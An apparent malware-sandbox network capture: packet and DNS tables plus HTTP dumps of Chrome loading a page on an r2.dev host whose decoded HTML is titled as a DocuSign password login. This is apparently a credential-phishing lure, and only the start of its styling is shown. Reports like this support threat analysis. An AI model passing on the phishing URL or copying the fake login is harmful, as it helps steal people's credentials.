                      Jan 15, 2025 01:44:08.817097902 CET49756443192.168.2.640.115.3.253
                      Jan 15, 2025 01:44:08.817150116 CET4434975640.115.3.253192.168.2.6
                      Jan 15, 2025 01:44:08.817291021 CET49756443192.168.2.640.115.3.253
                      Jan 15, 2025 01:44:08.818321943 CET49756443192.168.2.640.115.3.253
                      Jan 15, 2025 01:44:08.818335056 CET4434975640.115.3.253192.168.2.6
                      Jan 15, 2025 01:44:09.410478115 CET4434975595.154.228.177192.168.2.6
                      Jan 15, 2025 01:44:09.440186977 CET49755443192.168.2.695.154.228.177
                      Jan 15, 2025 01:44:09.440212965 CET4434975595.154.228.177192.168.2.6
                      Jan 15, 2025 01:44:09.441817045 CET4434975595.154.228.177192.168.2.6
                      Jan 15, 2025 01:44:09.441905022 CET49755443192.168.2.695.154.228.177
                      Jan 15, 2025 01:44:09.442504883 CET49755443192.168.2.695.154.228.177
                      Jan 15, 2025 01:44:09.442590952 CET4434975595.154.228.177192.168.2.6
                      Jan 15, 2025 01:44:09.442816973 CET49755443192.168.2.695.154.228.177
                      Jan 15, 2025 01:44:09.442825079 CET4434975595.154.228.177192.168.2.6
                      Jan 15, 2025 01:44:09.492927074 CET49755443192.168.2.695.154.228.177
                      Jan 15, 2025 01:44:09.605918884 CET4434975595.154.228.177192.168.2.6
                      Jan 15, 2025 01:44:09.605945110 CET4434975595.154.228.177192.168.2.6
                      Jan 15, 2025 01:44:09.605953932 CET4434975595.154.228.177192.168.2.6
                      Jan 15, 2025 01:44:09.605968952 CET4434975595.154.228.177192.168.2.6
                      Jan 15, 2025 01:44:09.605999947 CET49755443192.168.2.695.154.228.177
                      Jan 15, 2025 01:44:09.606036901 CET4434975595.154.228.177192.168.2.6
                      Jan 15, 2025 01:44:09.606054068 CET49755443192.168.2.695.154.228.177
                      Jan 15, 2025 01:44:09.606057882 CET4434975595.154.228.177192.168.2.6
                      Jan 15, 2025 01:44:09.606096983 CET49755443192.168.2.695.154.228.177
                      Jan 15, 2025 01:44:09.607395887 CET49755443192.168.2.695.154.228.177
                      Jan 15, 2025 01:44:09.607412100 CET4434975595.154.228.177192.168.2.6
                      Jan 15, 2025 01:44:09.622586012 CET4434975640.115.3.253192.168.2.6
                      Jan 15, 2025 01:44:09.622657061 CET49756443192.168.2.640.115.3.253
                      Jan 15, 2025 01:44:09.625396967 CET49756443192.168.2.640.115.3.253
                      Jan 15, 2025 01:44:09.625410080 CET4434975640.115.3.253192.168.2.6
                      Jan 15, 2025 01:44:09.625683069 CET4434975640.115.3.253192.168.2.6
                      Jan 15, 2025 01:44:09.630095005 CET49756443192.168.2.640.115.3.253
                      Jan 15, 2025 01:44:09.630541086 CET49756443192.168.2.640.115.3.253
                      Jan 15, 2025 01:44:09.630547047 CET4434975640.115.3.253192.168.2.6
                      Jan 15, 2025 01:44:09.630903006 CET49756443192.168.2.640.115.3.253
                      Jan 15, 2025 01:44:09.675323963 CET4434975640.115.3.253192.168.2.6
                      Jan 15, 2025 01:44:09.809160948 CET4434975640.115.3.253192.168.2.6
                      Jan 15, 2025 01:44:09.809293985 CET4434975640.115.3.253192.168.2.6
                      Jan 15, 2025 01:44:09.809360981 CET49756443192.168.2.640.115.3.253
                      Jan 15, 2025 01:44:09.827037096 CET49756443192.168.2.640.115.3.253
                      Jan 15, 2025 01:44:09.827075005 CET4434975640.115.3.253192.168.2.6
                      Jan 15, 2025 01:44:14.481733084 CET44349717142.250.185.228192.168.2.6
                      Jan 15, 2025 01:44:14.481820107 CET44349717142.250.185.228192.168.2.6
                      Jan 15, 2025 01:44:14.481870890 CET49717443192.168.2.6142.250.185.228
                      Jan 15, 2025 01:44:16.385576963 CET49717443192.168.2.6142.250.185.228
                      Jan 15, 2025 01:44:16.385595083 CET44349717142.250.185.228192.168.2.6
                      Jan 15, 2025 01:44:20.956836939 CET8049725172.66.0.235192.168.2.6
                      Jan 15, 2025 01:44:20.956897974 CET4972580192.168.2.6172.66.0.235
                      Jan 15, 2025 01:44:21.009145975 CET49836443192.168.2.640.115.3.253
                      Jan 15, 2025 01:44:21.009198904 CET4434983640.115.3.253192.168.2.6
                      Jan 15, 2025 01:44:21.009254932 CET49836443192.168.2.640.115.3.253
                      Jan 15, 2025 01:44:21.009905100 CET49836443192.168.2.640.115.3.253
                      Jan 15, 2025 01:44:21.009917974 CET4434983640.115.3.253192.168.2.6
                      Jan 15, 2025 01:44:21.809318066 CET4434983640.115.3.253192.168.2.6
                      Jan 15, 2025 01:44:21.809417009 CET49836443192.168.2.640.115.3.253
                      Jan 15, 2025 01:44:21.822341919 CET49836443192.168.2.640.115.3.253
                      Jan 15, 2025 01:44:21.822380066 CET4434983640.115.3.253192.168.2.6
                      Jan 15, 2025 01:44:21.822849989 CET4434983640.115.3.253192.168.2.6
                      Jan 15, 2025 01:44:21.824887037 CET49836443192.168.2.640.115.3.253
                      Jan 15, 2025 01:44:21.824953079 CET49836443192.168.2.640.115.3.253
                      Jan 15, 2025 01:44:21.824965000 CET4434983640.115.3.253192.168.2.6
                      Jan 15, 2025 01:44:21.825089931 CET49836443192.168.2.640.115.3.253
                      Jan 15, 2025 01:44:21.871341944 CET4434983640.115.3.253192.168.2.6
                      Jan 15, 2025 01:44:21.996335983 CET4434983640.115.3.253192.168.2.6
                      Jan 15, 2025 01:44:21.996493101 CET4434983640.115.3.253192.168.2.6
                      Jan 15, 2025 01:44:21.996591091 CET49836443192.168.2.640.115.3.253
                      Jan 15, 2025 01:44:21.996668100 CET49836443192.168.2.640.115.3.253
                      Jan 15, 2025 01:44:21.996702909 CET4434983640.115.3.253192.168.2.6
                      Jan 15, 2025 01:44:22.389852047 CET4972580192.168.2.6172.66.0.235
                      Jan 15, 2025 01:44:22.394968987 CET8049725172.66.0.235192.168.2.6
                      Jan 15, 2025 01:44:39.606894016 CET49923443192.168.2.640.115.3.253
                      Jan 15, 2025 01:44:39.606940985 CET4434992340.115.3.253192.168.2.6
                      Jan 15, 2025 01:44:39.607085943 CET49923443192.168.2.640.115.3.253
                      Jan 15, 2025 01:44:39.607873917 CET49923443192.168.2.640.115.3.253
                      Jan 15, 2025 01:44:39.607892036 CET4434992340.115.3.253192.168.2.6
                      Jan 15, 2025 01:44:40.400930882 CET4434992340.115.3.253192.168.2.6
                      Jan 15, 2025 01:44:40.401118994 CET49923443192.168.2.640.115.3.253
                      Jan 15, 2025 01:44:40.403323889 CET49923443192.168.2.640.115.3.253
                      Jan 15, 2025 01:44:40.403352022 CET4434992340.115.3.253192.168.2.6
                      Jan 15, 2025 01:44:40.404274940 CET4434992340.115.3.253192.168.2.6
                      Jan 15, 2025 01:44:40.406505108 CET49923443192.168.2.640.115.3.253
                      Jan 15, 2025 01:44:40.406580925 CET49923443192.168.2.640.115.3.253
                      Jan 15, 2025 01:44:40.406593084 CET4434992340.115.3.253192.168.2.6
                      Jan 15, 2025 01:44:40.406739950 CET49923443192.168.2.640.115.3.253
                      Jan 15, 2025 01:44:40.447367907 CET4434992340.115.3.253192.168.2.6
                      Jan 15, 2025 01:44:40.578052998 CET4434992340.115.3.253192.168.2.6
                      Jan 15, 2025 01:44:40.578304052 CET4434992340.115.3.253192.168.2.6
                      Jan 15, 2025 01:44:40.578766108 CET49923443192.168.2.640.115.3.253
                      Jan 15, 2025 01:44:40.580729961 CET49923443192.168.2.640.115.3.253
                      Jan 15, 2025 01:44:40.580729961 CET49923443192.168.2.640.115.3.253
                      Jan 15, 2025 01:44:40.580794096 CET4434992340.115.3.253192.168.2.6
                      Jan 15, 2025 01:44:51.121176004 CET4972680192.168.2.6172.66.0.235
                      Jan 15, 2025 01:44:51.127964973 CET8049726172.66.0.235192.168.2.6
                      Jan 15, 2025 01:45:03.215970039 CET50005443192.168.2.640.115.3.253
                      Jan 15, 2025 01:45:03.216026068 CET4435000540.115.3.253192.168.2.6
                      Jan 15, 2025 01:45:03.216126919 CET50005443192.168.2.640.115.3.253
                      Jan 15, 2025 01:45:03.216931105 CET50005443192.168.2.640.115.3.253
                      Jan 15, 2025 01:45:03.216959000 CET4435000540.115.3.253192.168.2.6
                      Jan 15, 2025 01:45:03.973690033 CET50006443192.168.2.6142.250.185.228
                      Jan 15, 2025 01:45:03.973778009 CET44350006142.250.185.228192.168.2.6
                      Jan 15, 2025 01:45:03.973865986 CET50006443192.168.2.6142.250.185.228
                      Jan 15, 2025 01:45:03.974251986 CET50006443192.168.2.6142.250.185.228
                      Jan 15, 2025 01:45:03.974289894 CET44350006142.250.185.228192.168.2.6
                      Jan 15, 2025 01:45:04.014055967 CET4435000540.115.3.253192.168.2.6
                      Jan 15, 2025 01:45:04.014265060 CET50005443192.168.2.640.115.3.253
                      Jan 15, 2025 01:45:04.016069889 CET50005443192.168.2.640.115.3.253
                      Jan 15, 2025 01:45:04.016102076 CET4435000540.115.3.253192.168.2.6
                      Jan 15, 2025 01:45:04.016772985 CET4435000540.115.3.253192.168.2.6
                      Jan 15, 2025 01:45:04.018531084 CET50005443192.168.2.640.115.3.253
                      Jan 15, 2025 01:45:04.018573999 CET50005443192.168.2.640.115.3.253
                      Jan 15, 2025 01:45:04.018588066 CET4435000540.115.3.253192.168.2.6
                      Jan 15, 2025 01:45:04.018714905 CET50005443192.168.2.640.115.3.253
                      Jan 15, 2025 01:45:04.063323021 CET4435000540.115.3.253192.168.2.6
                      Jan 15, 2025 01:45:04.190021038 CET4435000540.115.3.253192.168.2.6
                      Jan 15, 2025 01:45:04.190505028 CET50005443192.168.2.640.115.3.253
                      Jan 15, 2025 01:45:04.190535069 CET4435000540.115.3.253192.168.2.6
                      Jan 15, 2025 01:45:04.190604925 CET50005443192.168.2.640.115.3.253
                      Jan 15, 2025 01:45:04.607574940 CET44350006142.250.185.228192.168.2.6
                      Jan 15, 2025 01:45:04.607935905 CET50006443192.168.2.6142.250.185.228
                      Jan 15, 2025 01:45:04.607980967 CET44350006142.250.185.228192.168.2.6
                      Jan 15, 2025 01:45:04.609107971 CET44350006142.250.185.228192.168.2.6
                      Jan 15, 2025 01:45:04.609541893 CET50006443192.168.2.6142.250.185.228
                      Jan 15, 2025 01:45:04.609726906 CET44350006142.250.185.228192.168.2.6
                      Jan 15, 2025 01:45:04.663433075 CET50006443192.168.2.6142.250.185.228
                      Jan 15, 2025 01:45:14.506881952 CET44350006142.250.185.228192.168.2.6
                      Jan 15, 2025 01:45:14.506958008 CET44350006142.250.185.228192.168.2.6
                      Jan 15, 2025 01:45:14.507078886 CET50006443192.168.2.6142.250.185.228
                      Jan 15, 2025 01:45:16.389724016 CET50006443192.168.2.6142.250.185.228
                      Jan 15, 2025 01:45:16.389761925 CET44350006142.250.185.228192.168.2.6
                      TimestampSource PortDest PortSource IPDest IP
                      Jan 15, 2025 01:43:59.578885078 CET53580721.1.1.1192.168.2.6
                      Jan 15, 2025 01:43:59.693712950 CET53591871.1.1.1192.168.2.6
                      Jan 15, 2025 01:44:00.654553890 CET53530001.1.1.1192.168.2.6
                      Jan 15, 2025 01:44:03.916759014 CET5557853192.168.2.61.1.1.1
                      Jan 15, 2025 01:44:03.916872978 CET5164453192.168.2.61.1.1.1
                      Jan 15, 2025 01:44:03.923460007 CET53555781.1.1.1192.168.2.6
                      Jan 15, 2025 01:44:03.923472881 CET53516441.1.1.1192.168.2.6
                      Jan 15, 2025 01:44:05.574328899 CET4997953192.168.2.61.1.1.1
                      Jan 15, 2025 01:44:05.574551105 CET5017953192.168.2.61.1.1.1
                      Jan 15, 2025 01:44:05.583899975 CET53501791.1.1.1192.168.2.6
                      Jan 15, 2025 01:44:05.584271908 CET53499791.1.1.1192.168.2.6
                      Jan 15, 2025 01:44:06.109622002 CET5091253192.168.2.61.1.1.1
                      Jan 15, 2025 01:44:06.110018969 CET6188953192.168.2.61.1.1.1
                      Jan 15, 2025 01:44:06.118123055 CET53509121.1.1.1192.168.2.6
                      Jan 15, 2025 01:44:06.118550062 CET53618891.1.1.1192.168.2.6
                      Jan 15, 2025 01:44:07.390014887 CET5881353192.168.2.61.1.1.1
                      Jan 15, 2025 01:44:07.390227079 CET5825553192.168.2.61.1.1.1
                      Jan 15, 2025 01:44:07.402504921 CET53647861.1.1.1192.168.2.6
                      Jan 15, 2025 01:44:07.501763105 CET53582551.1.1.1192.168.2.6
                      Jan 15, 2025 01:44:07.609314919 CET53588131.1.1.1192.168.2.6
                      Jan 15, 2025 01:44:08.557620049 CET53605011.1.1.1192.168.2.6
                      Jan 15, 2025 01:44:08.576735020 CET53565171.1.1.1192.168.2.6
                      Jan 15, 2025 01:44:08.648283005 CET6336653192.168.2.61.1.1.1
                      Jan 15, 2025 01:44:08.648689032 CET5244553192.168.2.61.1.1.1
                      Jan 15, 2025 01:44:08.655838966 CET53524451.1.1.1192.168.2.6
                      Jan 15, 2025 01:44:08.656326056 CET53633661.1.1.1192.168.2.6
                      Jan 15, 2025 01:44:17.707768917 CET53491881.1.1.1192.168.2.6
                      Jan 15, 2025 01:44:36.693161011 CET53571731.1.1.1192.168.2.6
                      Jan 15, 2025 01:44:59.102819920 CET53504571.1.1.1192.168.2.6
                      Jan 15, 2025 01:44:59.449958086 CET53604371.1.1.1192.168.2.6
                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                      Jan 15, 2025 01:44:03.916759014 CET192.168.2.61.1.1.10x1d0cStandard query (0)www.google.comA (IP address)IN (0x0001)false
                      Jan 15, 2025 01:44:03.916872978 CET192.168.2.61.1.1.10x1b35Standard query (0)www.google.com65IN (0x0001)false
                      Jan 15, 2025 01:44:05.574328899 CET192.168.2.61.1.1.10x4fdaStandard query (0)pub-35a1d927529e4c9684409537cf8ff63f.r2.devA (IP address)IN (0x0001)false
                      Jan 15, 2025 01:44:05.574551105 CET192.168.2.61.1.1.10x1fd9Standard query (0)pub-35a1d927529e4c9684409537cf8ff63f.r2.dev65IN (0x0001)false
                      Jan 15, 2025 01:44:06.109622002 CET192.168.2.61.1.1.10xfe4aStandard query (0)pub-35a1d927529e4c9684409537cf8ff63f.r2.devA (IP address)IN (0x0001)false
                      Jan 15, 2025 01:44:06.110018969 CET192.168.2.61.1.1.10x63ebStandard query (0)pub-35a1d927529e4c9684409537cf8ff63f.r2.dev65IN (0x0001)false
                      Jan 15, 2025 01:44:07.390014887 CET192.168.2.61.1.1.10xd445Standard query (0)www.continentalsports.co.ukA (IP address)IN (0x0001)false
                      Jan 15, 2025 01:44:07.390227079 CET192.168.2.61.1.1.10xa211Standard query (0)www.continentalsports.co.uk65IN (0x0001)false
                      Jan 15, 2025 01:44:08.648283005 CET192.168.2.61.1.1.10x8484Standard query (0)www.continentalsports.co.ukA (IP address)IN (0x0001)false
                      Jan 15, 2025 01:44:08.648689032 CET192.168.2.61.1.1.10x6c70Standard query (0)www.continentalsports.co.uk65IN (0x0001)false
                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                      Jan 15, 2025 01:44:03.923460007 CET1.1.1.1192.168.2.60x1d0cNo error (0)www.google.com142.250.185.228A (IP address)IN (0x0001)false
                      Jan 15, 2025 01:44:03.923472881 CET1.1.1.1192.168.2.60x1b35No error (0)www.google.com65IN (0x0001)false
                      Jan 15, 2025 01:44:05.584271908 CET1.1.1.1192.168.2.60x4fdaNo error (0)pub-35a1d927529e4c9684409537cf8ff63f.r2.dev172.66.0.235A (IP address)IN (0x0001)false
                      Jan 15, 2025 01:44:05.584271908 CET1.1.1.1192.168.2.60x4fdaNo error (0)pub-35a1d927529e4c9684409537cf8ff63f.r2.dev162.159.140.237A (IP address)IN (0x0001)false
                      Jan 15, 2025 01:44:06.118123055 CET1.1.1.1192.168.2.60xfe4aNo error (0)pub-35a1d927529e4c9684409537cf8ff63f.r2.dev172.66.0.235A (IP address)IN (0x0001)false
                      Jan 15, 2025 01:44:06.118123055 CET1.1.1.1192.168.2.60xfe4aNo error (0)pub-35a1d927529e4c9684409537cf8ff63f.r2.dev162.159.140.237A (IP address)IN (0x0001)false
                      Jan 15, 2025 01:44:07.609314919 CET1.1.1.1192.168.2.60xd445No error (0)www.continentalsports.co.uk95.154.228.177A (IP address)IN (0x0001)false
                      Jan 15, 2025 01:44:08.656326056 CET1.1.1.1192.168.2.60x8484No error (0)www.continentalsports.co.uk95.154.228.177A (IP address)IN (0x0001)false
                      • pub-35a1d927529e4c9684409537cf8ff63f.r2.dev
                      • www.continentalsports.co.uk
                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      0192.168.2.649726172.66.0.235806468C:\Program Files\Google\Chrome\Application\chrome.exe
                      TimestampBytes transferredDirectionData
                      Jan 15, 2025 01:44:05.590259075 CET478OUTGET /docu/e_protocol.html HTTP/1.1
                      Host: pub-35a1d927529e4c9684409537cf8ff63f.r2.dev
                      Connection: keep-alive
                      Upgrade-Insecure-Requests: 1
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                      Accept-Encoding: gzip, deflate
                      Accept-Language: en-US,en;q=0.9
                      Jan 15, 2025 01:44:06.106714010 CET534INHTTP/1.1 301 Moved Permanently
                      Date: Wed, 15 Jan 2025 00:44:06 GMT
                      Content-Type: text/html
                      Content-Length: 167
                      Connection: keep-alive
                      Cache-Control: max-age=3600
                      Expires: Wed, 15 Jan 2025 01:44:06 GMT
                      Location: https://pub-35a1d927529e4c9684409537cf8ff63f.r2.dev/docu/e_protocol.html
                      Vary: Accept-Encoding
                      Server: cloudflare
                      CF-RAY: 9021d5d98b31437b-EWR
                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                      Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>
                      Jan 15, 2025 01:44:51.121176004 CET6OUTData Raw: 00
                      Data Ascii:


                      Session IDSource IPSource PortDestination IPDestination Port
                      0192.168.2.64971540.115.3.253443
                      TimestampBytes transferredDirectionData
                      2025-01-15 00:44:01 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 69 70 35 39 79 65 49 63 4d 45 61 42 71 77 54 6e 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 66 38 36 66 34 34 62 66 39 62 62 39 38 61 32 30 0d 0a 0d 0a
                      Data Ascii: CNT 1 CON 305MS-CV: ip59yeIcMEaBqwTn.1Context: f86f44bf9bb98a20
                      2025-01-15 00:44:01 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                      Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                      2025-01-15 00:44:01 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 69 70 35 39 79 65 49 63 4d 45 61 42 71 77 54 6e 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 66 38 36 66 34 34 62 66 39 62 62 39 38 61 32 30 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 57 4c 7a 37 45 33 4a 38 72 59 47 63 6c 55 61 59 78 45 6f 37 32 73 73 67 6a 4c 45 62 47 35 37 4e 46 66 66 4b 64 32 47 55 6a 47 69 51 7a 58 70 68 4c 55 32 53 63 44 55 61 4f 32 35 41 43 44 79 67 4e 30 62 66 64 66 45 59 36 32 51 5a 6b 72 6a 42 5a 58 69 65 53 77 4c 6a 63 76 50 31 39 42 54 39 65 72 51 2b 4e 4d 4d 38 57 74 51 61 76
                      Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: ip59yeIcMEaBqwTn.2Context: f86f44bf9bb98a20<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAWLz7E3J8rYGclUaYxEo72ssgjLEbG57NFffKd2GUjGiQzXphLU2ScDUaO25ACDygN0bfdfEY62QZkrjBZXieSwLjcvP19BT9erQ+NMM8WtQav
                      2025-01-15 00:44:01 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 69 70 35 39 79 65 49 63 4d 45 61 42 71 77 54 6e 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 66 38 36 66 34 34 62 66 39 62 62 39 38 61 32 30 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                      Data Ascii: BND 3 CON\WNS 0 197MS-CV: ip59yeIcMEaBqwTn.3Context: f86f44bf9bb98a20<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                      2025-01-15 00:44:01 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                      Data Ascii: 202 1 CON 58
                      2025-01-15 00:44:01 UTC58INData Raw: 4d 53 2d 43 56 3a 20 5a 5a 2b 46 4e 35 74 57 72 30 32 6c 35 57 68 72 58 6d 49 70 5a 67 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                      Data Ascii: MS-CV: ZZ+FN5tWr02l5WhrXmIpZg.0Payload parsing failed.


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      1192.168.2.649733172.66.0.2354436468C:\Program Files\Google\Chrome\Application\chrome.exe
                      TimestampBytes transferredDirectionData
                      2025-01-15 00:44:06 UTC706OUTGET /docu/e_protocol.html HTTP/1.1
                      Host: pub-35a1d927529e4c9684409537cf8ff63f.r2.dev
                      Connection: keep-alive
                      Upgrade-Insecure-Requests: 1
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                      Sec-Fetch-Site: none
                      Sec-Fetch-Mode: navigate
                      Sec-Fetch-User: ?1
                      Sec-Fetch-Dest: document
                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                      sec-ch-ua-mobile: ?0
                      sec-ch-ua-platform: "Windows"
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en;q=0.9
                      2025-01-15 00:44:06 UTC284INHTTP/1.1 200 OK
                      Date: Wed, 15 Jan 2025 00:44:06 GMT
                      Content-Type: text/html
                      Content-Length: 252205
                      Connection: close
                      Accept-Ranges: bytes
                      ETag: "ac9dbd4fd1fb0add29a1b8703bce9406"
                      Last-Modified: Thu, 09 Jan 2025 06:54:23 GMT
                      Server: cloudflare
                      CF-RAY: 9021d5ddac8242f8-EWR
                      2025-01-15 00:44:06 UTC1369INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 20 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 20 63 6c 61 73 73 3d 61 63 63 6f 75 6e 74 2d 73 65 72 76 65 72 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 74 69 74 6c 65 3e 44 6f 63 75 53 69 67 6e 20 4c 6f 67 69 6e 20 2d 20 45 6e 74 65 72 20 79 6f 75 72 20 70 61 73 73 77 6f 72 64 20 74 6f 20 73 69 67 6e 20 69 6e 3c 2f 74 69 74 6c 65 3e 0a 0a 3c 73 74 79 6c 65 20 64 61 74 61 2d 65 6d 6f 74 69 6f 6e 3d 63 73 73 20 64 61 74 61 2d 73 69 6e 67 6c 65 2d 66 69 6c 65 7a 2d 73 74 79 6c 65 73 68 65 65 74 3d 31 36 3e 2e 61 63 63 6f 75 6e 74 2d 73 65 72 76
                      Data Ascii: <!DOCTYPE html> <html lang=en class=account-server><meta charset=utf-8><meta name=viewport content="initial-scale=1.0"><title>DocuSign Login - Enter your password to sign in</title><style data-emotion=css data-single-filez-stylesheet=16>.account-serv
                      2025-01-15 00:44:06 UTC1369INData Raw: 73 75 62 74 65 78 74 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 30 7d 2e 69 6e 6b 2d 6c 69 6e 6b 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 35 72 65 6d 7d 2e 69 6e 6b 2d 63 68 61 6e 67 65 2d 75 73 65 72 2d 61 72 72 6f 77 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 2e 36 32 35 72 65 6d 7d 2e 69 6e 6b 2d 63 68 61 6e 67 65 2d 75 73 65 72 2d 62 75 74 74 6f 6e 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 66 6c 65 78 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 7d 2e 69 6e 6b 2d 75 73 65 72 2d 65 6d 61 69 6c 7b 6f 76 65 72 66 6c 6f 77 2d 77 72 61 70 3a 61 6e 79 77 68 65 72 65 7d 2e 69 6e 6b 2d 70 6f 69 6e 74 65 72 2d
                      Data Ascii: subtext{margin-top:0;margin-bottom:0}.ink-link{margin-top:1rem;line-height:1.5rem}.ink-change-user-arrow{display:flex;padding-right:.625rem}.ink-change-user-button{display:inline-flex;align-items:center}.ink-user-email{overflow-wrap:anywhere}.ink-pointer-
